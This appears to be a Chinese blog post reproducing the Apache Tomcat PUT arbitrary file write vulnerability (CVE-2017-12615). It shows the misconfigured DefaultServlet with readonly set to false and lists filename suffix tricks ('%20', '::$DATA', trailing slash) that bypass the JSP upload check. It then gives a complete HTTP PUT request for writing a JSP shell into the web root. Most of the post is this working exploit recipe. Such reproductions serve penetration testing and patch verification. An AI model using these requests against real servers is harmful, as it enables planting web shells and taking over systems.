Tomcat PUT方法任意写文件漏洞(CVE-2017-12615)

Tomcat PUT方法任意写文件漏洞(CVE-2017-12615)

Tomcat版本:8.5.19
Apache Tomcat 7.0.0 - 7.0.79

漏洞本质Tomcat配置了可写(readonly=false),导致我们可以往服务器写文件:


    default
    org.apache.catalina.servlets.DefaultServlet
    
        debug
        0
    
    
        listings
        false
    
    
        readonly
        false
    
    1

虽然Tomcat对文件后缀有一定检测(不能直接写jsp),但我们使用一些文件系统的特性(如Linux下可用/)来绕过了限制。

漏洞复现

直接发送以下数据包即可在Web根目录写入shell:

shell.jsp%20
shell.jsp::$DATA
shell.jsp/

PUT /1.jsp/ HTTP/1.1
Host: your-ip:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 5

shell

Tomcat PUT方法任意写文件漏洞(CVE-2017-12615)_第1张图片
Tomcat PUT方法任意写文件漏洞(CVE-2017-12615)_第2张图片

你可能感兴趣的:(渗透测试,漏洞复现)